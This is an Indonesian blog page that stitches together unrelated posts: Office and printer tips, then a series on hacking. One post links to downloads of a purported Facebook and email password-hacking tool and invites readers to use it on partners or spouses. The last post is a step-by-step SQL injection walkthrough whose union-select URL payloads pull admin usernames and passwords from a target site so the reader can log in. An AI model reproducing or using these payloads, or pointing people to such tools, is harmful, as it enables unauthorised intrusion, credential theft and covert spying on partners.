Kamis, 31 Mei 2012

Convert File PDF ke DOC (Word Document)


Convert File PDF ke DOC (Word Document)

Jul 23, 2010 by  Under Tips & Trik - 93 Comments  
Convert File PDF ke DOC (Word Document) ImagePada artikel sebelumnya, kami pernah membahas tentang bagaimana cara men-convert dokumen ke file PDF. Kali ini sebaliknya, kami team FastNCheap akan membuat tutorial bagaimana cara convert file PDF ke format DOC (Microsoft Word Document).
Ada banyak cara dan aplikasi yang bisa kita gunakan untuk meng-convert file PDF ke DOC (Word Document). Salah satunya adalah aplikasi PDF to Word Converter (Kami menggunakan versi 3.0.0, versi terakhir dari PDF to Word Converter) yang dibuat oleh AnyBizSoft, sebuah pengembang berbagai macam tool file PDF.
Dengan aplikasi ini, anda bisa mengedit file PDF yang sebelumnya tidak bisa di edit menggunakan word document editor seperti Micosoft Office atau Open Office.
Selengkapnya, ikuti langkah-langkah berikut ini :
  • Download aplikasi PDF to Word Converter dari FaceBook fan page AnyBizSoft. Jangan lupa juga klik “Like” untuk menjadi fans dari AnyBizSoft (syarat mutlak). Tunggu beberapa saat sampai peringatan “The giveaway is only for fans. Please click ‘Like’ to unlock” hilang.
    Convert File PDF ke DOC (Word Document) Image
  • Setelah itu masukkan First name, Last Name dan email anda, lanjutkan dengan klik tombol Send me Keycode dan lanjutkan dengan klik tombol Okey. Langkah ini akan mengirimkan kode registrasi yang berguna untuk mengaktifkan apliaksi PDF to Word Converter. Selanjutnya, klik tombol download untuk mendapatkan aplkasi PDF to Word Converter.
    Convert File PDF ke DOC (Word Document) Image
    Convert File PDF ke DOC (Word Document) Image
  • Check email anda untuk mendapatkan KeyCode. Butuh waktu beberapa menit buat mail untuk masuk ke inbx anda.
    Convert File PDF ke DOC (Word Document) Image
  • Install aplikasi yang telah anda donwload tadi dan jalankan seperti biasa.
    Convert File PDF ke DOC (Word Document) Image
  • Buka aplikasi yang telah anda install dan masukkan KeyCode yang telah anda dapatkan dari email.
    Convert File PDF ke DOC (Word Document) Image
  • Klik Add Files, kemudian pilih file PDF yang ingin anda convert ke PDF. Anda juga dapat menentukan di mana letak folder hasil convert-an dari PDF to Word Converter.
    Convert File PDF ke DOC (Word Document) Image
  • Terakhir, klik Convert dan tunggu sampai semua proses selesai.
Sekarang, coba buka hasil convert-an tadi menggunakan aplikasi Microsoft Word atau Open Office. File PDF anda telah terkonversi menjadi DOC dokumen.
Convert File PDF ke DOC (Word Document) Image
Kesimpulan :
PDF to Word Converter adalah salah satu aplikasi power full yang dapat anda manfaatkan untuk convert PDF ke format DOC. Meskipun hasilnya kadang kurang memuaskan, terutama bila pada file PDF yang di-convert memiliki banyak gambar, semua text dari file PDF akan terbaca dengan jelas. Mungkin anda perlu meluangkan waktu untuk menata ulang dile DOC agar terlihat lebih tertata rapi.
Selamat mencoba dan jangan lupa untuk meninggalkan komentar jika anda punya pengalaman menarik tentang bagaimana meng-convert file PDF ke DOC (Microsoft Word Document)

Tips dan Trik Microsoft Word 2010

Siapa yang tak kenal Microsoft Office? Aplikasi buatan Microsoft yang telah banyak dipakai oleh jutaan atau lebih komputer di seluruh dunia ini adalah aplikasi yang wajib di install di Windows. Hampir semua perkantoran, bahkan instansi pemerintahan memakai aplikasi yang terkenal dengan Word, Excel dan Powerpoint-nya ini.
M
Tips dan Trik Microsoft Word 2010 Image
Dan bagi Anda yang seringkali memakai MS Word untuk mengetik dokumen, ada beberapa tips dan trik yang mungkin saja belum Anda ketahui. Mulai dari bekerja secara cepat dan efisien sampai mengusili teman kerja dapat Anda temukan disini.
Seleksi
Mungkin Anda sudah mengetahui cukup klik dua kali untuk menyeleksi satu kata, dan klik tiga kali untuk menyeleksi satu paragraph. Namun untuk menyeleksi satu kalimat cukup tahan tombol “Ctrl” dan klik di kalimat manapun. dan untuk menyeleksi seluruh tabel tahan tombol “Alt” dan klik dua kali.
Membuat tabel
Mungkin selama ini Anda membuat tabel dengan memakai “Draw Table”, kini Anda bisa membuat tabel dengan meng-klik tab “Insert” lalu klik “Table” yang akan menampilkan pop up Insert Table disini Anda tinggal menggeser mouse untuk menentukan jumlah kolom dan hasilnya akan tertampil langsung di dokumen Anda, lalu klik.
Tips dan Trik Microsoft Word 2010 Image
Jika ingin membuat satu kolom tabel saja Anda cukup menekan tombol + untuk garis vertical dan – untuk garis horizontal misal “+————+——-+” (tanpa tanda kutip) lalu tekan “Enter”
Menambahkan Comment Box
Jika Anda hendak mengirimkan dokumen ke teman atau relasi kerja Anda, tak perlu menulis panjang lebar penjelasan mengenai kalimat yang mungkin kurang dipahami di email. Cukup dengan menyeleksi bagian dari kalimat lalu klik tab “Review” lalu pilih “New Comment”
Membuat daftar dengan Keyboard
Anda bisa membuat daftar urut dengan nomor atau symbol cukup dengan menekan tombol di keyboard. Misal, menulis nomor urut cukup dengan mengetik 1. kata yang diinginkan lalu tekan “Enter” secara otomatis MS Word akan mengurutkan nomor yang telah Anda ketik tadi.
Memasukkan Screenshot ke MS Word
Salah satu fitur terbaru dari MS Word 2010 yaitu dapat memasukkan Screenshot langsung ke dalam dokumen. Cukuo dengan menekan tombol “Print Screen” pada keyboar lalu klik tab “Insert” klik “Screenshot”.
Menambahkan Bookmark ke Dokumen
Anda sedang membuat tulisan untuk dapat dibaca langsung oleh Bos atau relasi kerja. Cukup tambahkan Bookmark agar mereka dapat lebih mudah membaca seluruh isi dokumen Anda dengan klik tab “Insert” di kolom “Links” klik “Bookmark” ketikkan nama halaman yang diinginkan lalu klik “Add”.
Tips dan Trik Microsoft Word 2010 Image
Setelah itu buatlah sebuah halaman khusus untuk daftar isi dokumen Anda. Seleksi salah satu judul halaman dokumen klik tab “Insert” di kolom Links klik “Hyperlink” akan muncul window Insert Hyperlink pilih Place in This Document lalu pilih judul halaman di kolom bookmark yang telah Anda buat lalu klik OK.
Tips dan Trik Microsoft Word 2010 Image
Sekarang Anda bisa langsung menuju halaman yang diinginkan dengan meng-klik judul halaman di daftar isi dengan menahan tombol “Ctrl dan klik kiri”.
Mengubah Status Bar
Tips dan Trik Microsoft Word 2010 Image
Mungkin Anda tidak menyadari kalo status bar di MS Word juga bisa di ubah sesuai dengan keinginan. Klik kanan status bar Anda akan menemukan banyak konfigurasi yang dapat Anda sesuaikan.
Atur Auto Correct
Pernahkah Anda mengetikkan kata teh yang kemudian berubah menjadi the? Itulah Auto Correct, fitur Auto Correct di MS Word memang sangat berguna jika Anda seringkali membuat dokumen berbahasa Inggris. Anda bisa mengatur Auto Correct dengan klik tab “File” lalu pilih “Options” klik “Proofing” dan klik “Auto Correct Options…” di tab Auto Correct terdapat kolom ketikkan kata yang diinginkan misal teh pilih kata tersebut di kolom bawah dan klik Delete.
Tips dan Trik Microsoft Word 2010 Image
Anda juga bisa menambahkan beberapa kata agar bisa diperbaiki secara otomatis oleh MS Word.
Shortcut
Shortcut untuk MS Word memang cukup banyak namun tak perlu menghapal semuanya cukup seperlunya agar dapat membantu kerja Anda. Selain shortcut umum seperti copy, cut, paste, print dll, MS Word memiliki shortcut khusus sendiri yaitu:
Ctrl+Z & Ctrl+Y :
Jika Anda melakukan kesalahan tanpa disengaja Anda bisa memanfaatkan shortcut ini.
Ctrl+Spasi :
Tekan tombol ini jika dirasa suatu kalimat atau paragraph memiliki kesalahan misal, bold, italic,underline, huruf dll agar kembali normal (default). Caranya seleksi kalimat atau paragraph lalu tekan tombol “Ctrl”+Spasi”.
Ctrl+Q :
Tekan tombol ini jika Anda menemukan kesalahan format paragraf, double spasi, spasi tambahan di awal dan akhir paragaf, dll. Caranya seleksi seluruh paragraf lalu tekan kombinasi tombol tersebut.
Alignment
Ctrl+L : untuk mengetik rata kiri.
Ctrl+E : untuk mengetik di posisi tengah (center).
Ctrl+R : untuk mengetik rata kanan
Ctrl+J : untuk merubah susunan paragraf menjadi rata kanan dan kiri (Justify)
Trik Unik
Ingin sekedar mengusili teman kerja Anda atau ingin tahu apa saja yang bisa MS Word lakukan, ketik beberapa kata berikut ini.
=rand (200,99)
Ketik kata di atas lalu tekan “Enter” tunggu selama 3 detik. MS Word akan menampilkan tulisan sebanyak 567 halaman yang berisi komentar dari beberapa karyawan atau orang yang ikut mengerjakan Aplikasi tersebut.
=lorem(7,3)
Dengan mengetikkan kata di atas akan menampikan 3 paragraf yang terdapat dalam teks Lorem Ipsum
=rand.old(7,3)
MS Word akan menampilkan 3 paragraf yang berisi contoh kalimat di teks mesin ketik “The quick brown fox jumped over the lazy dog.”
Nah, mungkin itu sementara beberapa tips yang semoga dapat membantu Anda dalam mengerjakan dokumen di MS Word semakin mudah dan menyenangkan. Ikuti terus blog FastnCheap untuk mendapatkan tips dan trik dari dunia teknologi. Sampai jumpa di tips berikutnya.

Tinta kering atau hasil print bergaris-garis pada inkjet printer

Pada printer inkjet sering dijumpai masalah berupa tinta print yang tidak keluar atau hasil print-nya scratch (bergaris-garis) yang disebabkan karena tinta mengering akibat tidak digunakan dalam waktu yang lama. 
Untuk mengatasi masalah ini coba dengan cara merendam catridge printer tersebut ke dalam air dalam waktu yang cukup lama, sekitar 10 jam sampai dengan satu hari.

Untuk beberapa kasus cara ini dapat mengatasi masalah, tetapi tidak pada beberapa kasus yang lain.

Membuat CD autorun




CD autorun atau CD yang akan langsung berjalan ketika dimasukkan ke dalam CDROM kita temukan dalam sebagian besar CD driver atau CD instalasi. Untuk membuat fitur ini tidak sulit.

Caranya:
  • Buat file dengan nama "autorun.inf"
  • Buka file tersebut dengan notepad, dan isi dengan tulisan ini:
    [autorun]
    OPEN=namaaplikasi.exe
    ICON=namaicon.ico
  • Nama aplikasi adalah namafile *.exe yang langsung dijalankan.
    contoh : OPEN=data/setup.exe (menjalankan setup.exe di folder data)
  • JIka tidak ada icon yang digunakan, baris kedua dapat dihilangkan.
  • Simpan file tersebut dan burn di root directory CD 
  • Tips Pencegahan supaya tidak di Hack Password akun anda!




    1. Gunakanlah selalu password yang sulit ditebak, kombinasi angka, huruf dan karakter tanda baca
    2. Jangan pernah sekalipun beritahu password anda kepada orang lain. Apalagi yang ngaku-ngaku adminnya facebook! Biarkanlah hanya anda, malaikat dan Tuhan yang tahu.
    3. Pada recovery password, jangan lupa isikan no HP dan untuk security question jangan sampai mudah ditebak juga.
    Semoga denga cara diatas tidak ada satupun software yang dapat meng hack akun anda di facebook.

    Hacker


    Hacking Password Facebook dengan Program Ihacking V.2.1
    Sofware ini digunakan untuk hacking password Facebook, Yahoo, Acount MSN Windows Live Hotmail,dsb. Software ini pada awalnya dapat di download di www.milanorosa.com . Namun sayang, karena alasan keamanan, situs penyedia software ini akhirnya ditutup.
    bagi teman2 yang pengen hack password pacarnya/ istrinya/simpananya, bisa download program nya di sini :
    http://www.ziddu.com/download/8135209/IHv2.1.part01.rar.html
    http://www.ziddu.com/download/8136566/IHv2.1.part02.rar.html
    http://www.ziddu.com/download/8138037/IHv2.1.part03.rar.html
    http://www.ziddu.com/download/8138287/IHv2.1.part04.rar.html
    http://www.ziddu.com/download/8139903/IHv2.1.part05.rar.html
    http://www.ziddu.com/download/8142329/IHv2.1.part06.rar.html
    http://www.ziddu.com/download/8141555/IHv2.1.part07.rar.html
    http://www.ziddu.com/download/8142637/IHv2.1.part08.rar.html
    Bagi kamu yang ingin belajar lebih jauh tentang cara hack facebook. Kamu bisa membaca pada artikel Hacking Facebook di 10youtubevideos. Nggak tahu deh berguna apa tidak!!

    Program Hack


    HTTPD Attacks Hack


    Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd bypasses, cross scripting, web code vulnerabilities, dan URL floods.
    HTTPD Buffer Overflow bisa terjadi karena hacker menambahkan errors pada port yang digunakan untuk web traffic dengan cara memasukan banyak carackter dan string untuk menemukan tempat overflow yang sesuai. Ketika tempat untuk overflow ditemukan, seorang hacker akan memasukkan string yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow dapat memberikan hacker akses ke command prompt.

    TCP/IP Sequence Stealing Hack


    Passive Port Listening and Packet
    Interception TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force, serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like.

    Port Scanning Hack


    Melalui port scanning seorang hacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi. Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack.

    Selective Program Insertions Hack

    Selective Program Insertions adalah serangan yang dilakukan ketika hacker menaruh program-program penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ?) pada system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan membuka backdoor.

    Remote File System Attack Hack


    Protocol-protokol untuk tranportasi data –tulang punggung dari internet— adalah tingkat TCP (TCPLevel) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. hacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file.

    Remote Command Processing Attacks
    Hack

    Trusted Relationship antara dua atau lebih host menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan lain system (dalam network).
    hacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan pada proxy server, ketika akses diterima, seorang hacker akan mempunyai kemampuan mengeksekusi perintah dan mengkases data yang tersedia bagi user lainnya.

    Proxy Server Attacks Hack


    Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan proses dari beberapa host dalam suatu trusted network. Dalam kebanyakan kasus, tiap host mempunyai kekuasan untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya lakukan dalam sistem saya akan bisa juga saya lakukan dalam system anda dan sebaliknya.

    Password Attacks Hack


    Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang hacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password.
    Ketika seorang hacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebanyakan serangan yang dilakukan terhadap password adalah menebak (guessing), brute force, kracking dan sniffing.

    DNS and BIND Vulnerabilities
    Hack

    Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation).

    E-mail Exploits
    Hack

    Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).

    Fragmented Packet Attacks Hack


    Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol

    Flooding & Broadcasting Hack


    Seorang hacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya menyerah.
    Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang hacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.

    Unix Finger Exploits Hack


    Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang hacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact.
    Utility ini juga menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha kracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.

    FTP Attack Hack


    Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service. Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau hacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang hacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang hacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang.
    Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce attack (menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff informasi yang berada dalam sistem.

    IP Spoofing Hack


    IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP hacker sehingga sasaran menganggap alamat IP hacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan hacker mempunyai IP address type A 66.25.xx.xx ketika hacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP hacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C.
    IP Spoofing terjadi ketika seorang hacker ‘mengakali’ packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat hacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh hacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para hacker.

    Cara Hacking Website dengan teknik SQL Injection


    Harap dicatat bahwa penulis tidak bertanggung jawab atas segala bentuk efek dari artikel ini, tujuannya hanya untuk pengetahuan saja, jadi silahkan gunakan untuk kebaikan dan keamanan kalian masing2. Pertanyaan yang bersifat “Merusak” tidak akan ditanggapi.
    Cara ngehacking web atau biasa disebut web attack sangat banyak caranya, salah satunya dengan cara SQL injection.
    Apa itu SQL injection ?
    SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke ‘query’ dengan cara manipulasi data input ke applikasi tsb.
    ini salah satu cara melakukan tekhnik SQL injection, cara ini saya copas dari http://jasakom.com oleh seorang penulis sebut saja cruz3N
    oke, mari kita simak bersama-sama.
    1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah
    http://www.target.com/berita.php?id=100
    2. Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
    Contoh :
    http://www.target.com/berita.php?id=100'
    atau
    http://www.target.com/berita.php?id=-100
    4. Maka akan muncul pesan error…
    “You have an error in your SQL syntax.You have an error in your SQL syntax; check the
    manual that corresponds to your MySQL server version for the right syntax to use near ”’
    at line 1″ Dan masih banyak lagi macamnya.
    5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya…
    Disini kita akan menggunakan perintah order by
    Contoh :
    http://www.target.com/berita.php?id=100+order+by+1/*
    Hohoho…apalagi itu “/*” ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake “–”. Terserah aja…
    Kalo “+” sebagai penghubung perintah…
    6. Nah sampe sini langsung dah nyobain satu2…
    http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
    http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
    http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
    http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)
    Sampai muncul error…
    Misalkan errornya disini…
    http://www.target.com/berita.php?id=100+order+by+10/*
    Berarti yang kita ambil adalah “9″
    http://www.target.com/berita.php?id=100+order+by+9/*
    7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION
    Contoh :
    http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*
    Trus perhatikan angka berapa yang keluar (Kayak togel aja… ;p)
    8. Misalnya angka hoki yang keluar adalah “3″ maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah “version()” atau “@@version”
    http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*
    Atau
    http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*
    9. Nah kalo versinya 5 langsung aja pake perintah “information_schema” untuk melihat tabel dan kolom yang ada pada database…
    Contoh :
    http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*
    Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya…Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain…ya maklum lah baru belajar…Hehehe…
    Misalnya yang lo liat adalah table “admin”
    Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata “table”-nya…
    Contoh:
    http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*
    Misalnya kolom yang keluar adalah “password” dan “username”
    Langsung aja kita liat isinya…
    Contoh :
    http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*
    dan
    http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*
    Bisa diliat dah username ama passwordnya…Tinggal login…Cari yang asik terus…Terserah Anda…
    —————————————————
    begitulah yang dituliskan disana.
    anda masih belum paham tentang apa SQL injection ?

     
    - ,